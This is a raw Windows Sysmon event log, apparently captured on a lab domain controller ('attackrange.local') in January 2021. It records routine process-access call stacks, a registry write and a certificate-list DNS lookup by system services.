:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.773{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000011227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-DriverVerSetValue2021-01-18 
13:58:26.773{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe\REGISTRY\A\{75980880-3470-ec82-7755-0f71170c6805}\Root\InventoryDevicePnp\terminput_bus/umb/2&2c22bcc9&0&session2keyboard0\DriverVerVersion10.0.14393.0 10341000x800000000000000011226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.586{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+74a3|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.523{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:26.523{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000011253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:25.779{59A5CD1D-8E56-6005-2E00-00000000A301}2464crl.comodoca.com0::ffff:151.139.128.14;C:\Windows\sysmon64.exe 10341000x800000000000000011252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:27.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:27.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:27.023{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:27.023{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.867{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.852{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.852{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.633{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.633{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9404-6005-0705-00000000A301}4580C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:28.633{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.602{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:28.602{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
